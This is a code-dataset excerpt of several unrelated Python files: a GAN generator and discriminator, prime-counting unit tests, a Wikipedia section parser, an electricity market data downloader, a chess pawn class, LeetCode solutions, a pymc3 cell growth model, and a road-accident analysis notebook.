                  nn.ReLU(inplace=True)
                  ]
        self.gamma=nn.Linear(in_features=self.base * self.scale * 2,
                             out_features=self.base * self.scale * 2, bias=False)
        self.beta = nn.Linear(in_features=self.base * self.scale * 2,
                              out_features=self.base * self.scale * 2, bias=False)
        # AdaLIN residual blocks, registered individually by name.
        for i in range(self.n_res):
            setattr(self,f'adapolin_{i}',Adapolin_Stack(self.base*self.scale*2))
        # Decoder: upsample + conv halving channels each step.
        for i in range(self.downsample):
            self.scale=2**(self.downsample-i-1)
            self.up+=[
                nn.Upsample(scale_factor=2),
                nn.ReflectionPad2d(1),
                nn.Conv2d(in_channels=self.base*self.scale*2,
                          out_channels=self.base*self.scale,
                          kernel_size=(3,3),
                          stride=(1,1),
                          bias=False),
                AdaLIN(channels=self.base*self.scale),
                nn.ReLU(inplace=True)
            ]
        # Output head: 7x7 conv back to RGB in [-1, 1].
        self.up+=[nn.ReflectionPad2d(3),
                  nn.Conv2d(in_channels=self.base,
                            out_channels=3,
                            kernel_size=(7, 7),
                            stride=(1, 1),
                            bias=False),
                  nn.Tanh()]
        self.down=nn.Sequential(*self.down)
        self.up=nn.Sequential(*self.up)
        self.res=nn.Sequential(*self.res)
        self.mlp=nn.Sequential(*self.mlp)
    def forward(self,x):
        x=self.down(x)
        x=self.res(x)
        # CAM: weight feature maps by the avg/max-pool classifier weights.
        gap,gap_logit=self.class_activation_map(x,
                                                pool_fn=F.adaptive_avg_pool2d,
                                                map_fn=self.gap_fc)
        gmp,gmp_logit=self.class_activation_map(x,
                                                pool_fn=F.adaptive_max_pool2d,
                                                map_fn=self.gmp_fc)
        x=torch.cat([gap,gmp],dim=1)
        x=self.act(self.conv11(x))
        logit=torch.cat([gap_logit,gmp_logit],dim=1)
        # Channel-summed attention map, returned for visualisation.
        heatmap=torch.sum(x,dim=1)
        # Derive per-sample (gamma, beta) for the AdaLIN blocks.
        xp=F.adaptive_avg_pool2d(x,1)
        xp=self.mlp(xp.view(xp.shape[0],-1))
        gamma=self.gamma(xp).unsqueeze(2).unsqueeze(3)
        beta=self.beta(xp).unsqueeze(2).unsqueeze(3)
        for i in range(self.n_res):
            x=getattr(self,f'adapolin_{i}')(x,gamma=gamma,beta=beta)
        x=self.up(x)
        return x,logit,heatmap
    def class_activation_map(self,x,pool_fn,map_fn):
        """Pool x to 1x1, score it with `map_fn`, and return the feature map
        reweighted by the classifier weights plus the logit."""
        pooled=pool_fn(x,1)
        logit=map_fn(pooled.view(pooled.shape[0],-1))
        weights=list(map_fn.parameters())[0]
        o=x*weights.unsqueeze(2).unsqueeze(3)
        return o,logit
class Discriminator(nn.Module):
    """PatchGAN-style discriminator with spectral-normalised convolutions and
    the same CAM attention scheme as the generator. Returns
    (patch_map, cam_logits, heatmap)."""
    def __init__(self,base=64,downsample=3):
        super().__init__()
        self.downsample=downsample
        self.base=base
        self.down=[]
        # Stem: strided 4x4 conv from RGB.
        self.down+=[
            nn.ReflectionPad2d(1),
            nn.utils.spectral_norm(nn.Conv2d(
                in_channels=3,
                out_channels=self.base,
                kernel_size=(4,4),
                stride=(2,2), )),
            nn.LeakyReLU(0.2,inplace=True) ]
        for i in range(self.downsample):
            self.scale=2**(i)
            # Last downsampling stage keeps stride 1 (no further shrink).
            self.down += [
                nn.ReflectionPad2d(1),
                nn.utils.spectral_norm(nn.Conv2d(
                    in_channels=self.base*self.scale,
                    out_channels=self.base*self.scale*2,
                    kernel_size=(4, 4),
                    stride=(2, 2) if i!=self.downsample-1 else (1,1))),
                nn.LeakyReLU(0.2, inplace=True)]
        # CAM heads at the deepest channel count (self.scale keeps its value
        # from the last loop iteration).
        self.gmp_fc=nn.utils.spectral_norm(nn.Linear(in_features=self.base*self.scale*2,
                                                     out_features=1,bias=False))
        self.gap_fc =nn.utils.spectral_norm(nn.Linear(in_features=self.base * self.scale * 2,
                                                      out_features=1, bias=False))
        # 1x1 conv fusing the concatenated gap/gmp attention maps.
        self.conv11=nn.Conv2d(in_channels=self.base*self.scale*4,
                              out_channels=self.base*self.scale*2,
                              kernel_size=(1,1),
                              stride=(1,1))
        self.act=nn.LeakyReLU(0.2,inplace=True)
        # Final per-patch realness map squashed by tanh.
        self.out_map=nn.Sequential(
            nn.ReflectionPad2d(1),
            nn.utils.spectral_norm(nn.Conv2d(
                in_channels=self.base*self.scale*2,
                out_channels=1,
                kernel_size=(4, 4),
                stride=(1, 1))),
            nn.Tanh()
        )
        self.down=nn.Sequential(*self.down)
    def forward(self,x):
        x=self.down(x)
        gap,gap_logit=self.class_activation_map(x,
                                                pool_fn=F.adaptive_avg_pool2d,
                                                map_fn=self.gap_fc)
        gmp,gmp_logit=self.class_activation_map(x,
                                                pool_fn=F.adaptive_max_pool2d,
                                                map_fn=self.gmp_fc)
        x=torch.cat([gap,gmp],dim=1)
        x=self.act(self.conv11(x))
        logit=torch.cat([gap_logit,gmp_logit],dim=1)
        # Channel-summed attention map, returned for visualisation.
        heatmap=torch.sum(x,dim=1)
        x=self.out_map(x)
        return x,logit,heatmap
    def class_activation_map(self,x,pool_fn,map_fn):
        """Pool x to 1x1, score it with `map_fn`, and return the feature map
        reweighted by the classifier weights plus the logit."""
        pooled=pool_fn(x,1)
        logit=map_fn(pooled.view(pooled.shape[0],-1))
        weights=list(map_fn.parameters())[0]
        o=x*weights.unsqueeze(2).unsqueeze(3)
        return o,logit
'''
G=Generator()
D_L=Discriminator(base=64)
D_G=Discriminator(downsample=5)
x=torch.randn(1,3,128,128)
x,logit,heatmap=G(x)
dg,logitdg,hdg=D_G(x)
dl,logitdl,hdl=D_L(x)
print(dg.shape)
print(logitdg.shape)
print(hdg.shape)
print(dl.shape)
print(logitdl.shape)
print(hdl.shape)
print(x.shape)
print(logit.shape)
print(heatmap.shape)
'''
| true |
3eda0cf33e5df0f6203f00e0722414db838b749c | Python | Madrant/leetcode | /python/204.Count-primes/test.py | UTF-8 | 2,363 | 3.09375 | 3 | [] | no_license | #!/usr/bin/python3
import unittest
from run import NaiveSolution, FastSolution, FastestSolution
class SolutionTest(unittest.TestCase):
    """Shared countPrimes checks; subclasses supply a concrete solver in setUp."""
    def setUp(self):
        # The base class has no solver, so test_2 exits early when run on it.
        self.solution = None
    def test_2_countPrimes(self):
        # countPrimes(n) is expected to count primes strictly below n.
        if not self.solution:
            return
        self.assertEqual(self.solution.countPrimes(0), 0)
        self.assertEqual(self.solution.countPrimes(1), 0)
        self.assertEqual(self.solution.countPrimes(2), 0)
        self.assertEqual(self.solution.countPrimes(3), 1)
        self.assertEqual(self.solution.countPrimes(4), 2)
        self.assertEqual(self.solution.countPrimes(5), 2)
        self.assertEqual(self.solution.countPrimes(6), 3)
        self.assertEqual(self.solution.countPrimes(7), 3)
        self.assertEqual(self.solution.countPrimes(8), 4)
        self.assertEqual(self.solution.countPrimes(9), 4)
        self.assertEqual(self.solution.countPrimes(10), 4)
        # There are 500 prime numbers before 3572
        self.assertEqual(self.solution.countPrimes(3572), 500)
class NaiveSolutionTest(SolutionTest):
    """Runs the shared countPrimes tests with NaiveSolution, plus isPrime
    spot checks (currently disabled, see below)."""
    def setUp(self):
        self.solution = NaiveSolution()
    def test_1_isPrime(self):
        # NOTE(review): this bare `return` disables every assertion below —
        # presumably a temporary switch-off; self.skipTest("reason") would
        # make the intent explicit in the test report.
        return
        # 0 and 1 is not a prime numbers
        self.assertFalse(self.solution.isPrime(0))
        self.assertFalse(self.solution.isPrime(1))
        self.assertTrue(self.solution.isPrime(2))
        self.assertTrue(self.solution.isPrime(3))
        self.assertTrue(self.solution.isPrime(5))
        self.assertTrue(self.solution.isPrime(7))
        self.assertTrue(self.solution.isPrime(11))
        self.assertFalse(self.solution.isPrime(4))
        self.assertFalse(self.solution.isPrime(6))
        self.assertFalse(self.solution.isPrime(8))
        self.assertFalse(self.solution.isPrime(9))
        self.assertFalse(self.solution.isPrime(10))
        self.assertFalse(self.solution.isPrime(90))
        self.assertFalse(self.solution.isPrime(91))
        self.assertTrue(self.solution.isPrime(97))
        self.assertTrue(self.solution.isPrime(101))
        self.assertTrue(self.solution.isPrime(3571))
class FastSolutionTest(NaiveSolutionTest):
    """Runs the shared prime tests against FastSolution.

    Bug fix: this class was also named ``NaiveSolutionTest``, which rebound
    the module attribute — unittest discovery then only saw this subclass
    and the NaiveSolution case was silently never exercised under its own
    name. Renaming to ``FastSolutionTest`` restores both test classes.
    """
    def setUp(self):
        self.solution = FastSolution()
class FastestSolutionTest(SolutionTest):
    """Runs the shared countPrimes tests against FastestSolution."""
    def setUp(self):
        self.solution = FastestSolution()
if __name__ == "__main__":
unittest.main(verbosity = 2)
| true |
82fc3589e63cd6c6586bd609babbbcd9cb405345 | Python | polpol0820/NLP100problems | /ch3/src/23.py | UTF-8 | 519 | 3.265625 | 3 | [] | no_license | #23. セクション構造
import json
import re
"""
reは正規表現
正規表現についてはもっと知る必要がありそう。。。
結構メンドクサイの塊
"""
# Scan the JSONL Wikipedia dump line by line and keep the article body for
# the "イギリス" (UK) entry.
# Fix: the file handle was opened and never closed; a context manager
# releases it deterministically once the article is found.
with open("./../jawiki-country.json", "r") as json_open:
    for row in json_open:
        row = json.loads(row)
        if row["title"] == "イギリス":
            txt_uk = row["text"]
            break
# A MediaWiki section heading looks like "== Name ==": capture the run of
# '=' (section level = count - 1) and the heading text between the runs.
pattern = r'^(\={2,})\s*(.+?)\s*(\={2,}).*$'
result = '\n'.join(i[1] + ":" + str(len(i[0]) - 1) for i in re.findall(pattern, txt_uk, re.MULTILINE))
print(result)
564ccf80dc78f575f27cc6d4317e4fa2eb902e90 | Python | ADGEfficiency/nem-data | /nemdata/nemde.py | UTF-8 | 4,108 | 2.609375 | 3 | [] | no_license | import datetime
import pathlib
import typing
import warnings
import numpy as np
import pandas as pd
import pydantic
import requests
from rich import print
from nemdata import utils
from nemdata.config import DEFAULT_BASE_DIRECTORY
from nemdata.constants import constants
class NEMDETable(pydantic.BaseModel):
    """Static description of the NEMDE price-setter table."""
    # Data is published at 5-minute resolution.
    frequency: int = 5
    # Timestamp column used to build the interval index.
    interval_column: str = "PeriodID"
class NEMDEFile(pydantic.BaseModel):
    """One day of NEMDE price-setter data: source URL plus the local paths
    the download/unzip/clean steps read and write."""
    year: int
    month: int
    day: int
    # Download URL of the daily zip archive on nemweb.com.au.
    url: str
    # Name of the XML file expected inside the archive.
    xml_name: str
    # Local directory holding raw and cleaned artefacts for this day.
    data_directory: pathlib.Path
    # Where the downloaded archive is stored (data_directory / "raw.zip").
    zipfile_path: pathlib.Path
def make_many_nemde_files(
    start: str, end: str, base_directory: pathlib.Path
) -> list[NEMDEFile]:
    """Create one NEMDEFile descriptor per calendar day in [start, end]."""
    calendar = pd.date_range(start=start, end=end, freq="D")
    return [
        make_one_nemde_file(
            year=stamp.year, month=stamp.month, day=stamp.day, base_directory=base_directory
        )
        for stamp in calendar
    ]
def make_one_nemde_file(
    year: int, month: int, day: int, base_directory: pathlib.Path
) -> NEMDEFile:
    """Build the NEMDEFile descriptor for a single day.

    Side effect: creates the day's local data directory (mkdir -p).
    """
    padded_month = str(month).zfill(2)
    padded_day = str(day).zfill(2)
    # Daily zip of price-setter XML files in AEMO's wholesale data archive.
    url = f"http://www.nemweb.com.au/Data_Archive/Wholesale_Electricity/NEMDE/{year}/NEMDE_{year}_{padded_month}/NEMDE_Market_Data/NEMDE_Files/NemPriceSetter_{year}{padded_month}{padded_day}_xml.zip"
    xml_name = f"NemPriceSetter_{year}{padded_month}{padded_day}.xml"
    data_directory = base_directory / "nemde" / f"{year}-{padded_month}-{padded_day}"
    data_directory.mkdir(exist_ok=True, parents=True)
    return NEMDEFile(
        year=year,
        month=month,
        day=day,
        url=url,
        xml_name=xml_name,
        data_directory=data_directory,
        zipfile_path=data_directory / "raw.zip",
    )
def find_xmls(path: pathlib.Path) -> list[pd.DataFrame]:
    """Parse every top-level ``*.xml`` file in *path* into a DataFrame."""
    xml_files = (entry for entry in path.iterdir() if entry.suffix == ".xml")
    return [pd.read_xml(xml_file) for xml_file in xml_files]
def download_nemde(
    start: str,
    end: str,
    table_name: str = "nemde",
    base_directory: pathlib.Path = DEFAULT_BASE_DIRECTORY,
    dry_run: bool = False,
) -> pd.DataFrame:
    """Download, clean and concatenate NEMDE data for each day in [start, end].

    Returns an empty DataFrame when no day yielded data (pd.concat raises
    ValueError on an empty list).
    """
    # NOTE(review): `table_name` is accepted but never used — confirm whether
    # it should select a table instead of the hard-coded NEMDETable().
    table = NEMDETable()
    files = make_many_nemde_files(start, end, base_directory)
    dataset = []
    for file in files:
        data = download_one_nemde(table, file, dry_run)
        if data is not None:
            dataset.append(data)
    try:
        return pd.concat(dataset, axis=0)
    except ValueError:
        return pd.DataFrame()
def download_one_nemde(
    table: NEMDETable, file: NEMDEFile, dry_run: bool
) -> typing.Union[pd.DataFrame, None]:
    """Return the cleaned DataFrame for one day, downloading if needed.

    Serves the cached parquet when present; returns None when the archive is
    not available upstream; otherwise downloads, unzips, parses the XMLs and
    cleans them, then (unless dry_run) writes clean.csv/clean.parquet.
    """
    clean_fi = file.data_directory / "clean.parquet"
    if clean_fi.exists():
        print(f"  [blue]CACHED[/] {' '.join(clean_fi.parts[-5:])}")
        return pd.read_parquet(clean_fi)
    else:
        print(f"  [blue]NOT CACHED[/] {' '.join(clean_fi.parts[-5:])}")
        data_available = utils.download_zipfile(file)
        if not data_available:
            print(f"  [red]NOT AVAILABLE[/] {' '.join(file.zipfile_path.parts[-5:])}")
            return None
        else:
            print(f"  [green]DOWNLOADING[/] {' '.join(file.zipfile_path.parts[-5:])}")
            # NOTE(review): download_zipfile() was already called just above —
            # this second call looks redundant; confirm it is idempotent.
            utils.download_zipfile(file)
            utils.unzip(file.zipfile_path)
            xmls = find_xmls(file.data_directory)
            data = pd.concat(xmls, axis=0)
            # get problems with a value of '5' without the cast to float
            data["BandNo"] = data["BandNo"].astype(float)
            # already timezone aware here
            # Source timestamps are fixed at UTC+10; assert before converting
            # to the configured NEM timezone.
            data["PeriodID"] = pd.to_datetime(data["PeriodID"])
            assert data["PeriodID"].dt.tz._offset == datetime.timedelta(seconds=3600 * 10)
            data["PeriodID"] = data["PeriodID"].dt.tz_convert(constants.nem_tz)
            data = utils.add_interval_column(data, table)
            if not dry_run:
                print(f"  [green]SAVING    [/] {clean_fi}")
                data.to_csv(clean_fi.with_suffix(".csv"))
                data.to_parquet(clean_fi.with_suffix(".parquet"))
            return data
| true |
413891bda1d7e24a47a95404f3f50fd849d80f94 | Python | kanav-raina/Automation-with-Selenium | /actions_demo.py | UTF-8 | 434 | 2.75 | 3 | [] | no_license | import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
# NOTE(review): uses the legacy Selenium 3 APIs (positional driver path,
# find_element_by_name) which were removed in Selenium 4 — confirm the
# pinned selenium version.
driver=webdriver.Chrome("/home/kanav/Downloads/automation/chromedriver")
driver.get("https://google.com")
#Locate the search box element
search_box=driver.find_element_by_name("q")
time.sleep(5)
#type in your search query into the search box and submit with Enter
search_box.send_keys("seleniumhq"+Keys.RETURN)
time.sleep(10)
# Print the results-page title, then close the browser window.
print(driver.title)
driver.close()
| true |
f3e151af1fc6f3109cca18fd9fb07d435e2700ca | Python | heman-oliver/chess | /pawn.py | UTF-8 | 2,046 | 3.5 | 4 | [] | no_license | import pygame
from constants import SQUARE_SIZE
from color import Color
class Pawn(object):
    """A pawn on an 8x8 board.

    ``board.chess_board`` is an 8x8 grid of two-character strings: "--" for
    an empty square, otherwise side + piece letter (e.g. "wp" = white
    pawn). White pawns move toward row 0, black pawns toward row 7.
    """

    def __init__(self, row, col, board) -> None:
        self.row = row
        self.col = col
        # First character of the square string encodes the side ('w'/'b').
        self.side = board.chess_board[row][col][0]
        self.board = board

    def draw_valid_moves(self, screen, valid_moves):
        """Draw a circle marker on every square in `valid_moves` (pawns only)."""
        if self.board.chess_board[self.row][self.col][1] == 'p':
            for valid_move in valid_moves:
                pygame.draw.circle(screen, Color.YELLOW, (valid_move[1]* SQUARE_SIZE + SQUARE_SIZE//2, valid_move[0]* SQUARE_SIZE + SQUARE_SIZE//2), 15)

    def get_valid_moves(self):
        """Return the list of [row, col] squares this pawn may move to.

        Bug fix: the two-square opening advance previously checked only the
        landing square, so a pawn could jump over a piece standing directly
        in front of it; it now also requires the intermediate square to be
        empty (the double push is nested under the single-push check).
        Forward moves are additionally bounds-checked so a pawn on the last
        rank no longer wraps around via negative indexing.
        """
        valid_moves = []
        grid = self.board.chess_board
        if self.side == "w":
            if self.row - 1 >= 0:
                if grid[self.row - 1][self.col] == "--":
                    valid_moves.append([self.row - 1, self.col])
                    # Double push: only from the start rank, both squares empty.
                    if self.row == 6 and grid[self.row - 2][self.col] == "--":
                        valid_moves.append([self.row - 2, self.col])
                # Diagonal captures of black pieces.
                if self.col - 1 >= 0 and grid[self.row - 1][self.col - 1][0] == 'b':
                    valid_moves.append([self.row - 1, self.col - 1])
                if self.col + 1 <= 7 and grid[self.row - 1][self.col + 1][0] == 'b':
                    valid_moves.append([self.row - 1, self.col + 1])
        elif self.side == "b":
            if self.row + 1 <= 7:
                if grid[self.row + 1][self.col] == "--":
                    valid_moves.append([self.row + 1, self.col])
                    # Double push: only from the start rank, both squares empty.
                    if self.row == 1 and grid[self.row + 2][self.col] == "--":
                        valid_moves.append([self.row + 2, self.col])
                # Diagonal captures of white pieces.
                if self.col - 1 >= 0 and grid[self.row + 1][self.col - 1][0] == 'w':
                    valid_moves.append([self.row + 1, self.col - 1])
                if self.col + 1 <= 7 and grid[self.row + 1][self.col + 1][0] == 'w':
                    valid_moves.append([self.row + 1, self.col + 1])
        return valid_moves
11bc1605e648110fca52ee65c4baf85255337c9b | Python | kongtianyi/cabbird | /leetcode/linked_list_cycle_II.py | UTF-8 | 490 | 2.921875 | 3 | [] | no_license | from structure.listnode import *
def detectCycle(head):
    """Floyd's cycle detection: return the node where the cycle begins,
    or None when the list is acyclic."""
    slow = fast = head
    meeting = None
    # Phase 1: advance the fast pointer two steps per iteration until it
    # either falls off the end (no cycle) or meets the slow pointer.
    while fast and fast.next and fast.next.next:
        fast = fast.next.next
        slow = slow.next
        if fast == slow:
            meeting = slow
            break
    if meeting is None:
        return None
    # Phase 2: the head and the meeting point are equidistant from the
    # cycle entry, so walking both in lockstep lands on it.
    probe = head
    while probe != meeting:
        probe = probe.next
        meeting = meeting.next
    return probe
if __name__=="__main__":
head=listToNode([1,2,4,3,5,6])
print detectCycle(head)
| true |
cef574c4eaeb3c9675d569097ce3b1942f9f427d | Python | meyer-lab/ps-growth-model | /grmodel/pymcGrowth.py | UTF-8 | 8,880 | 2.796875 | 3 | [
"MIT"
] | permissive | """
This module handles experimental data, by fitting a growth and death rate for each condition separately.
"""
from os.path import join, dirname, abspath
import pandas
import numpy as np
import pymc3 as pm
import theano.tensor as T
fitKwargs = {"tune": 3000, "progressbar": False, "target_accept": 0.9}
def theanoCore(timeV, div, deathRate, apopfrac, d):
    """Assemble the core growth model as theano expressions.

    Returns (lnum, eap, deadapop, deadnec): live cells, early-apoptotic
    cells, cells dead via apoptosis, and cells dead via necrosis, each as a
    (conditions x timepoints) tensor.
    """
    # Make a vector of time and one for time-constant values
    timeV = T._shared(timeV)
    constV = T.ones_like(timeV)  # pylint: disable=no-member
    # Calculate the growth rate (division minus death), per condition.
    GR = T.outer(div - deathRate, constV)
    # cGRd is used later (apoptotic death rate relative to growth + d)
    cGRd = T.outer(deathRate * apopfrac, constV) / (GR + d)
    # b is the rate straight to death (non-apoptotic fraction)
    b = T.outer(deathRate * (1 - apopfrac), constV)
    # Exponential growth of the live population.
    lnum = T.exp(GR * timeV)
    # Number of early apoptosis cells at start is 0.0
    eap = cGRd * (lnum - T.exp(-d * timeV))
    # Calculate dead cells via apoptosis and via necrosis
    deadnec = b * (lnum - 1) / GR
    deadapop = d * cGRd * (lnum - 1) / GR + cGRd * (T.exp(-d * timeV) - 1)
    return (lnum, eap, deadapop, deadnec)
def convSignal(lnum, eap, deadapop, deadnec, conversions):
    """Convert model cell populations into measured image-area signals.

    ``conversions`` is ((confl_conv, apop_conv, dna_conv), (apop_offset,
    dna_offset)). Confluence covers every population; the apoptosis channel
    covers early plus dead apoptotic cells; the DNA channel covers all dead
    cells. The apop/dna channels additionally carry a constant offset.
    """
    (confl_conv, apop_conv, dna_conv), (apop_off, dna_off) = conversions
    total_cells = lnum + eap + deadapop + deadnec
    confl_exp = total_cells * confl_conv
    apop_exp = (eap + deadapop) * apop_conv + apop_off
    dna_exp = (deadapop + deadnec) * dna_conv + dna_off
    return (confl_exp, apop_exp, dna_exp)
def conversionPriors(conv0):
    """Set the fluorescence conversion priors inside the active pm.Model.

    Returns ((confl_conv, apop_conv, dna_conv), (apop_offset, dna_offset)),
    the tuple layout expected by convSignal().
    """
    # Set up conversion rates, centred on the measured starting confluence.
    confl_conv = pm.Lognormal("confl_conv", np.log(conv0), 0.1)
    apop_conv = pm.Lognormal("apop_conv", np.log(conv0) - 2.06, 0.1)
    dna_conv = pm.Lognormal("dna_conv", np.log(conv0) - 1.85, 0.1)
    # Priors on the ratios between conversion factors (observed nodes tie
    # the three factors together).
    pm.Lognormal("confl_apop", -2.06, 0.0647, observed=apop_conv / confl_conv)
    pm.Lognormal("confl_dna", -1.85, 0.125, observed=dna_conv / confl_conv)
    pm.Lognormal("apop_dna", 0.222, 0.141, observed=dna_conv / apop_conv)
    # Offset values for apop and dna
    apop_offset = pm.Lognormal("apop_offset", np.log(0.1), 0.1)
    dna_offset = pm.Lognormal("dna_offset", np.log(0.1), 0.1)
    return ((confl_conv, apop_conv, dna_conv), (apop_offset, dna_offset))
def deathPriors(numApop):
    """Set priors for the cell-death parameters inside the active pm.Model.

    Returns (d, apopfrac): the apoptosis-to-death rate (scalar) and the
    per-condition apoptotic fraction (vector of length numApop).
    """
    # Rate of moving from apoptosis to death, assumed invariant wrt. treatment
    d = pm.Lognormal("d", np.log(0.01), 0.5)
    # Fraction of dying cells that go through apoptosis (flat Beta prior)
    apopfrac = pm.Beta("apopfrac", 1.0, 1.0, shape=numApop)
    return d, apopfrac
def build_model(conv0, doses, timeV, expTable):
    """Build and return the pyMC growth/death model.

    `expTable` holds the flattened confl/apop/dna observations; the model
    fits per-dose growth and death rates plus shared conversion factors.
    """
    growth_model = pm.Model()
    with growth_model:
        conversions = conversionPriors(conv0)
        d, apopfrac = deathPriors(len(doses))
        # Specify vectors of prior distributions
        # Growth rate
        div = pm.Uniform("div", lower=0.0, upper=0.035, shape=len(doses))
        # Rate of entering apoptosis or skipping straight to death
        deathRate = pm.Lognormal("deathRate", np.log(0.001), 0.5, shape=len(doses))
        lnum, eap, deadapop, deadnec = theanoCore(timeV, div, deathRate, apopfrac, d)
        # Convert model calculations to experimental measurement units
        confl_exp, apop_exp, dna_exp = convSignal(lnum, eap, deadapop, deadnec, conversions)
        # Observed error values for confl (residuals modelled as Normal with
        # their own empirical spread).
        confl_obs = T.reshape(confl_exp, (-1,)) - expTable["confl"]
        pm.Normal("dataFit", sd=T.std(confl_obs), observed=confl_obs)
        # Observed error values for apop
        apop_obs = T.reshape(apop_exp, (-1,)) - expTable["apop"]
        pm.Normal("dataFita", sd=T.std(apop_obs), observed=apop_obs)
        # Observed error values for dna
        dna_obs = T.reshape(dna_exp, (-1,)) - expTable["dna"]
        pm.Normal("dataFitd", sd=T.std(dna_obs), observed=dna_obs)
    return growth_model
class GrowthModel:
    """ Model for fitting data incorporating cell death response. """
    def performFit(self):
        """Run NUTS sampling and store the trace as self.df (DataFrame)."""
        model = build_model(self.conv0, self.doses, self.timeV, self.expTable)
        samples = pm.sample(model=model, **fitKwargs)
        self.df = pm.backends.tracetab.trace_to_dataframe(samples)
    def __init__(self, loadFile, comb=None, interval=True):
        """Import experimental data.

        loadFile: prefix of the three CSVs under data/singles/.
        comb: name of a combination drug; when set, doses become 2-tuples.
        interval: when False, keep only the first/last hour of measurements.
        """
        # Property list: measurement channel -> CSV filename suffix.
        properties = {"confl": "_confluence_phase.csv", "apop": "_confluence_green.csv", "dna": "_confluence_red.csv"}
        # Find path for csv files in the repository.
        pathcsv = join(dirname(abspath(__file__)), "data/singles/" + loadFile)
        # Pull out selected column data
        self.doses = []
        self.drugs = []
        selconv0 = []
        # Get dict started
        self.expTable = dict()
        # Read in both observation files. Return as formatted pandas tables.
        # Data tables to be kept within class.
        for key, value in properties.items():
            # Read input file
            dataset = pandas.read_csv(pathcsv + value)
            # Subtract control
            # NOTE(review): DataFrame.sub is not in-place and its result is
            # discarded here, so no control subtraction actually happens —
            # likely should be `dataset1 = dataset1.sub(...)`; confirm.
            dataset1 = dataset.iloc[:, 2: len(dataset.columns)]
            dataset1.sub(dataset1["Control"], axis=0)
            data = pandas.concat([dataset.iloc[:, 0:2], dataset1], axis=1, sort=False)
            # If interval=False, filter for endpoint data
            if not interval:
                # Keep data within an hour of the beginning or end
                data = data.loc[(data["Elapsed"] < 1.0) | (max(data["Elapsed"]) - data["Elapsed"] < 1.0)]
            # Get phase confl was t=0 for confl_conv calculation
            if key == "confl":
                conv0 = np.mean(data.loc[data["Elapsed"] == 0].iloc[:, 2:])
                # Set the time vector
                self.timeV = data.iloc[:, 1].values
            assert len(data.columns) > 3
            for col in range(2, len(data.columns)):
                # Set the name of the condition we're considering
                condName = data.columns.values[col]
                # For data with combination therapies
                if comb is not None:
                    # Represent dose with a tuple of len(2) in each case
                    # If control
                    if "Control" in condName:
                        drug = "Control"
                        dose = (0, 0)
                    # If only the combination drug
                    elif condName.split(" ")[0] == comb:
                        drug = comb
                        dose = (0, float(condName.split(" ")[1]))
                    # If contains drug besides the combination drug
                    elif "blank" not in condName.lower():
                        try:  # Both combination drug and another drug
                            drug1str = condName.split(", ")[0]
                            combstr = condName.split(", ")[1]
                            dose = (float(drug1str.split(" ")[1]), float(combstr.split(" ")[1]))
                            drug = drug1str.split(" ")[0] + "+" + combstr.split(" ")[0]
                        except IndexError:  # Only the other drug
                            drug = condName.split(" ")[0]
                            dose = (condName.split(" ")[1], 0)
                    # Add data to expTable
                    # NOTE(review): this append runs even for "blank" columns
                    # (none of the branches above matched), reusing the stale
                    # drug/dose from the previous column — confirm intent.
                    self.expTable.setdefault(key, []).append(data.iloc[:, col].values)
                    # Append to class variables once per column of data
                    if key == "confl":
                        self.drugs.append(drug)
                        self.doses.append(dose)
                        selconv0.append(conv0[col - 2])
                else:  # For data without combinations
                    if "blank" not in condName.lower():
                        # Add the name of the condition we're considering
                        try:
                            drug = condName.split(" ")[0]
                            dose = condName.split(" ")[1]
                        except IndexError:
                            drug = "Control"
                            dose = 0
                        # Add data to expTable
                        self.expTable.setdefault(key, []).append(data.iloc[:, col].values)
                        # Append to class variables once per column of data
                        if key == "confl":
                            self.drugs.append(drug)
                            self.doses.append(dose)
                            selconv0.append(conv0[col - 2])
            # Reshape experimental data into 1D array
            self.expTable[key] = np.array(self.expTable[key]).reshape((-1,))
        # Record averge conv0 for confl prior
        self.conv0 = np.mean(selconv0)
| true |
f1faf4010a554b17696fe9aaa28c217c5fe3847a | Python | blackwings001/algorithm | /leetcode/51-100/_54_spiralOrder.py | UTF-8 | 1,681 | 3.625 | 4 | [] | no_license | class Solution(object):
def spiralOrder(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[int]
"""
result = []
if matrix == []:
return result
i = 0 # 第几圈,每圈的起点是matrix[i][i]
cur_row = len(matrix) # 第i圈的行数
cur_col = len(matrix[0]) # 第i圈的列数
while True:
# 定位该圈四个点的横纵坐标, 只需要对角两个点的坐标即可
row1 = i
row2 = i + cur_row - 1
col1 = i
col2 = i + cur_col - 1
if cur_row >= 2 and cur_col >= 2:
result.extend([matrix[row1][j] for j in range(col1, col2)]) # 使用列表表达式添加元素,matrix[row1:row2][col1]这种方式是错的
result.extend([matrix[i][col2] for i in range(row1, row2)])
result.extend([matrix[row2][j] for j in range(col2, col1, -1)])
result.extend([matrix[i][col1] for i in range(row2, row1, -1)])
cur_row -= 2
cur_col -= 2
i += 1
continue
elif cur_col == 0 or cur_row == 0:
return result
elif cur_row == 1:
# 只有一行的情况
result.extend([matrix[row1][j] for j in range(col1, col2 + 1)])
elif cur_col == 1:
# 只有一列的情况
result.extend([matrix[i][col2] for i in range(row1, row2 + 1)])
return result
if __name__ == '__main__':
    # Quick manual check: a 2x1 matrix should print [3, 2].
    solution = Solution()
    result = solution.spiralOrder([[3],[2]])
    print(result)
11335239bcd4b5345e640e3a131202c1cf589972 | Python | teejaytanmay/Road-Accident-Severity | /Road_Accident_Severity.py | UTF-8 | 6,387 | 2.625 | 3 | [
"MIT"
] | permissive |
# coding: utf-8
# In[70]:
import numpy as np
import pandas as pd
#Visualisation Libraries
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
import warnings
warnings.filterwarnings('ignore')
import seaborn as sns
from pandas.plotting import scatter_matrix
#Training and Preprocessing Libraries
from xgboost import XGBClassifier
from imblearn.ensemble import EasyEnsembleClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import roc_auc_score
import pickle
# In[71]:
# Human-readable labels for the three Accident_Severity classes (1/2/3).
class_names = ['Fatal', 'Severe', 'Slight']
# In[72]:
# Raw accident records; expected in the working directory.
data= pd.read_csv("accidentva.csv")
# In[73]:
def max_val(s):
    """Styler helper: highlight every cell equal to the column maximum."""
    highlight = 'background-color: yellow'
    return [highlight if flag else '' for flag in (s == s.max())]
# Casualties per year, with the worst year highlighted via max_val.
year_wise_casualties = data.groupby(['Year'])['Number_of_Casualties'].sum()
year_wise_casualties = year_wise_casualties.reset_index()
year_wise_casualties = year_wise_casualties.style.apply(max_val, axis=0)
